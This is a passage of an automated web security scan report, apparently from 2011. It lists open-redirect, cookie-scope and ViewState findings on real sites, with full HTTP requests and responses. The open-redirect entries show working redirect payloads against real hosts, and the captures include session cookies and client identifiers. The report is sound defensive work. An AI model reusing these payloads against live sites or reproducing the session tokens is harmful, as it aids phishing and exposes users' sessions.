md1bGFpci1jYXVzZS13ZWlyZC1kcmVhbXNkFgJmDxUBOkNhbiBBc3RlcHJvIFdlaWdodCBHYWluPyBDYW4gU2luZ3VsYWlyIENhdXNlIFdlaXJkIERyZWFtcz9kAgcPZBYCAgEPZBYCAgIPDxYCHwFoZGRk" />
...[SNIP]...

14.3. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Request

GET /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:32 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO6Y*xNkN2I5MjVjYi05YzUzLTRhY2MtYjcwOC03ZmQxMjAzMTMxNGU1; expires=Wed, 13-Jul-2011 21:36:32 GMT; path=/
Set-Cookie: ASP.NET_SessionId=esw2jyaebe5e2r55rhgfig45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49627


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   Is Cholesterol Treatment Worth It? - EverydayHealth.com
<
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
...[SNIP]...

14.4. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Request

GET /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:32 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO7eIwsxNDRhNTExOC0xODcxLTQwN2ItYmNjOS1kZDk5OTdlYTE1N2I1; expires=Wed, 13-Jul-2011 21:36:32 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ytmqve451nrbiy55ltp0oe55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48908


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   TVs Common in Daycare Centers Despite Guidelines - Kids' H
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTMwOTUyNTA1MQ9kFgQCAQ9kFgICBA8WAh4EVGV4dAWGCA0KPG1ldGEgcHJvcGVydHk9Im9nOnRpdGxlIiBjb250ZW50PSJUVnMgQ29tbW9uIGluIERheWNhcmUgQ2VudGVycyBEZXNwaXRlIEd1aWRlbGluZXMgLSBLaWRzJyBIZWFsdGggQ2VudGVyIC0gRXZlcnlkYXkgSGVhbHRoIi8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6ZGVzY3JpcHRpb24iICBydW5hdD0ic2VydmVyIiAgaWQ9ImZiZGVzY3JpcHRpb24iIGNvbnRlbnQ9Ik1vcmUgdGhhbiB0d28tdGhpcmRzIG9mIGRheWNhcmUgY2VudGVycyBpbmNsdWRlZCBpbiBhIG5ldyBVLlMuIHN0dWR5IGhhdmUgVFZzIGF2YWlsYWJsZSBmb3IgY2hpbGRyZW4gdG8gd2F0Y2gsIGFuZCBuZWFybHkgNjAgcGVyY2VudCBvZiB0aGUgY2VudGVycyBpZ25vcmVkIHRoZSBBbWVyaWNhbiBBY2FkZW15IG9mIFBlZGlhdHJpY3MnIGd1aWRlbGluZXMgZm9yIHRlbGV2aXNpb24gZXhwb3N1cmUgaW4geW91bmcga2lkcy4iID4NCjxtZXRhIHByb3BlcnR5PSJvZzp0eXBlIiBjb250ZW50PSJhcnRpY2xlIiAvPg0KPG1ldGEgcHJvcGVydHk9Im9nOmltYWdlIiBjb250ZW50PSJodHRwOi8vaW1hZ2VzLmFnb3JhbWVkaWEuY29tL2V2ZXJ5ZGF5aGVhbHRoL2djbXMvbG9nb19laF81MHg1MC5naWYiIC8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6c2l0ZV9uYW1lIiBjb250ZW50PSJFdmVyeWRheUhlYWx0aC5jb20iLz4NCjxtZXRhIHByb3BlcnR5PSJmYjphcHBfaWQiIGNvbnRlbnQ9IjEzNTM0NjAzNjQ5MDE4NiIvPg0KPG1ldGEgcHJvcGVydHk9ImZiOmFkbWlucyIgY29udGVudD0iIiAvPg0KPG1ldGEgcHJvcGVydHk9Im9nOnVybCIgcnVuYXQ9InNlcnZlciIgaWQ9ImZidXJsIiBjb250ZW50PSJodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9raWRzLWhlYWx0aC8wNTA0L3R2cy1jb21tb24taW4tZGF5Y2FyZS1jZW50ZXJzLWZsb3V0aW5nLWd1aWRlbGluZXMuYXNweCIgLz4NCg0KPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cDovL2Nvbm5lY3QuZmFjZWJvb2submV0L2VuX1VTL2FsbC5qcyN4ZmJtbD0xIj48L3NjcmlwdD5kAgMPZBYCAgEPZBYCAgIPZBYIZg9kFgRmDw8WAh4HVmlzaWJsZWhkZAIBD2QWAgIBD2QWAmYPDxYEHghDc3NDbGFzcwUKdmVydGljYWxhZB4EXyFTQgICZGQCAg9kFgICAQ9kFgQCAQ8PFgIfAAUOTmV4dCBBcnRpY2xlOiBkZAIDDxYCHgtfIUl0ZW1Db3VudAIBFgJmD2QWAgIBDw8WAh4LTmF2aWdhdGVVcmwFQ2h0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2tpZHMtaGVhbHRoL3RvZGRsZXJzLWFuZC1zaGFyaW5nLmFzcHhkFgJmDxUBHFRlYWNoaW5nICBUb2RkbGVycyAgVG8gU2hhcmVkAgMPZBYCAgEPZBYEAgEPDxYCHwAFIFJlbGF0ZWQgQXJ0aWNsZXMgb24gS2lkcycgSGVhbHRoZGQCAw8WAh8EAgMWBmYPZBYCAgEPDxYCHwUFQ2h0dHA6Ly93d3cuZXZlcnlkYXlo
ZWFsdGguY29tL2tpZHMtaGVhbHRoL3RvZGRsZXJzLWFuZC1zaGFyaW5nLmFzcHhkFgJmDxUBHFRlYWNoaW5nICBUb2RkbGVycyAgVG8gU2hhcmVkAgEPZBYCAgEPDxYCHwUFS2h0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2tpZHMtaGVhbHRoL3NsZWVwLXNvbHV0aW9ucy1mb3ItdG9kZGxlcnMuYXNweGQWAmYPFQEdU2xlZXAgU29sdXRpb25zIEZvciAgVG9kZGxlcnNkAgIPZBYCAgEPDxYCHwUFRGh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2tpZHMtaGVhbHRoL3RvZGRsZXJzLXBpY2t5LWVhdGVycy5hc3B4ZBYCZg8VAShIb3cgVG8gR2V0IFBpY2t5IEVhdGVycyBUbyBUcnkgTmV3IEZvb2RzZAIHD2QWBAIBD2QWAgICDw8WAh8BaGRkAgUPFgIfAWdkZA==" />
...[SNIP]...

14.5. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Request

GET /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:33 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO9S9eM0ZDUxYzkzYi0zMDJmLTQwYmYtOTcwNC1mNDg4N2I4MDBiZmM1; expires=Wed, 13-Jul-2011 21:36:33 GMT; path=/
Set-Cookie: ASP.NET_SessionId=tew4lhmlby1awfarbc5plyur; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47316


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   3 Ways to Put the Wow! Back in Your Sex Life - Sexual Heal
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
...[SNIP]...

15. Open redirection
There are 2 instances of this issue:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:


15.1. http://b.scorecardresearch.com/r [d.c parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The value of the d.c request parameter is used to perform an HTTP redirect. The payload http%3a//a931d9ba52d92a20e/a%3fgif was submitted in the d.c parameter. This caused a redirection to the following URL:

Request

GET /r?c2=6035805&d.c=http%3a//a931d9ba52d92a20e/a%3fgif&d.o=spnprod&d.x=52797902&d.t=page&d.u=http%3A%2F%2Faol.sportingnews.com%2Fnfl%2Fstory%2F2011-05-04%2Fathletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec1_lnk3%257C60545 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?icid=maing-grid7%7Cmain5%7Cdl4%7Csec1_lnk3%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://a931d9ba52d92a20e/a?gif
Date: Thu, 05 May 2011 01:10:31 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Sat, 04-May-2013 01:10:31 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


15.2. http://ib.adnxs.com/getuid [name of an arbitrarily supplied request parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload http%3a//a2f90a939365257d7/a%3f1 was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

Request

GET /getuid?http%3a//a2f90a939365257d7/a%3f1=1 HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anj=Kfu=8fG7vhgj[2<?0P(*AuB-u**g1:XIEGDEhzW()U9M1kUGf3$2.f0R>9.acl`F4%p2Nl.UXEE*e?s.KZk)1P8:JhD>3]0OXTvN!yxE%+(uoie>W`_v8QfQ%yo5xj:Z3>gd/L60<:0H$58xf@TP8EN^Aa7.qES'cu)ziVp`aanbh'IXK_')9#*'OqB0__+7d).vaGpBe9>V?b=^3-#H@!=%>IE/HM`)s3*[`hUEAwY-atIxWZl9RF$+OaI:l_Qcc9wmRBbW$qm9'55djeSa8ZQ96*Jp)C^/<CN-yHf5FURTYHOv]@%<7Aq6u^k]-O]7X=2zKSL4quR8kO_D>X[HvK1.Z8LyTgPDtFmwP=9UjfKherrC(!HN)-rs$$.Z4RwKgg$hjvE=h]Y3^aGI31FC_+(AsbutS4%o=cG=F6ppp35v0Hp53EQnWXio#:w1_scIl_O(gee'(4OTfW/q:Rz1+w6b.Vi<p.T*C2GR6e]tqP0@3dSr9ox*G.!htZ]Mz+FTi@UGkKz@XApYJmq$=Vw>B=cnuV1(XHu?f9kld6tUGu]mWIwdMo@:9[ns]Nq8sV$[>K:4>wF](16qdoZ$6'I1F:`tO4!]q; icu=ChII-sEBEAoYCiAKKAowg_iG7gQQg_iG7gQYCQ..; uuid2=2724386019227846218; sess=1;

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 06-May-2011 10:53:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 03-Aug-2011 10:53:10 GMT; domain=.adnxs.com; HttpOnly
Location: http://a2f90a939365257d7/a?1=1
Date: Thu, 05 May 2011 10:53:10 GMT
Content-Length: 0
Connection: close


16. Cookie scoped to parent domain
There are 277 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-Cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


16.1. http://api.twitter.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: api.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); auth_token=; __utma=43838368.551233229.1303561994.1303568398.1304617828.3; __utmc=43838368; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwEiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2%250AM2FkZmI2Yw%253D%253D--253a20e395e9e3ad595503b00398ea64e2518b85; __utmb=43838368.7.10.1304617828; k=173.193.214.243.1304470443436909;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 13:01:48 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304600508-68009-30283
ETag: "8c8290204e3166bcf0e10bec724ac3d9"
Last-Modified: Thu, 05 May 2011 13:01:48 GMT
X-Runtime: 0.01076
Content-Type: text/html; charset=utf-8
Content-Length: 42972
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 95714beb9935a6e0cdc38e423f4769ee345dce06
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwE6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2M2FkZmI2YyIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7AA%253D%253D--e25c9608c35c992185266e68f57f4b2dcddac49b; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html >
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />

<script type="text/javascript" charset="utf-8">



...[SNIP]...

16.2. http://api.twitter.com/1/statuses/66119447177474049/retweeted_by.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/66119447177474049/retweeted_by.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/66119447177474049/retweeted_by.json?count=15 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
X-PHX: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); k=173.193.214.243.1304470443436909; __utma=43838368.551233229.1303561994.1303568398.1304617828.3; __utmc=43838368; __utmb=43838368.5.10.1304617828; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwE6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2M2FkZmI2YyIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7AA%253D%253D--e25c9608c35c992185266e68f57f4b2dcddac49b

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:50:39 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304599839-63994-13720
X-RateLimit-Limit: 1000
ETag: "d751713988987e9331980363e24189ce"-gzip
Last-Modified: Thu, 05 May 2011 12:50:39 GMT
X-RateLimit-Remaining: 914
X-Runtime: 0.00917
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bc137096
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: fed15e03edbe1d943c09c55bbe7bf4f5e051822e
X-RateLimit-Reset: 1304603431
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwEiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2%250AM2FkZmI2Yw%253D%253D--253a20e395e9e3ad595503b00398ea64e2518b85; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 2

[]

16.3. http://api.twitter.com/1/statuses/show.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/show.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/show.json?include_entities=true&contributor_details=true&id=66119447177474049 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
X-PHX: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); k=173.193.214.243.1304470443436909; __utma=43838368.551233229.1303561994.1303568398.1304617828.3; __utmc=43838368; __utmb=43838368.5.10.1304617828; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwEiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2%250AM2FkZmI2Yw%253D%253D--253a20e395e9e3ad595503b00398ea64e2518b85

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:50:33 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304599833-41034-58992
X-RateLimit-Limit: 1000
ETag: "d912e849d74296736258b8b5739996d5"-gzip
Last-Modified: Thu, 05 May 2011 12:50:33 GMT
X-RateLimit-Remaining: 982
X-Runtime: 0.01207
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bc137096
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 2cf65be715f7eb51cc58e221e6160ba3025c8657
X-RateLimit-Reset: 1304603431
Set-Cookie: original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; path=/
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwE6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2M2FkZmI2YyIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7AA%253D%253D--e25c9608c35c992185266e68f57f4b2dcddac49b; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 1734

{"text":"@saritaa_raqueel Yo te quiero mas que tu ami xss (L)","coordinates":null,"truncated":false,"id_str":"66119447177474049","source":"web","geo":null,"favorited":false,"retweet_count":0,"entities
...[SNIP]...

16.4. http://api.twitter.com/1/statuses/user_timeline.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?include_entities=1&include_available_features=1&contributor_details=true&include_rts=true&user_id=165951124 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
X-PHX: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); k=173.193.214.243.1304470443436909; __utma=43838368.551233229.1303561994.1303568398.1304617828.3; __utmc=43838368; __utmb=43838368.5.10.1304617828; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwEiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2%250AM2FkZmI2Yw%253D%253D--253a20e395e9e3ad595503b00398ea64e2518b85

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:50:33 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304599833-46716-42503
X-RateLimit-Limit: 1000
ETag: "ab7de5d59aaf708a4f83ad36220e28d2"-gzip
Last-Modified: Thu, 05 May 2011 12:50:33 GMT
X-RateLimit-Remaining: 981
X-Runtime: 0.02291
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bc137096
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 0a69017ca8a0b28e7a8a0bd2312756be458baa6b
X-RateLimit-Reset: 1304603431
Set-Cookie: original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; path=/
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
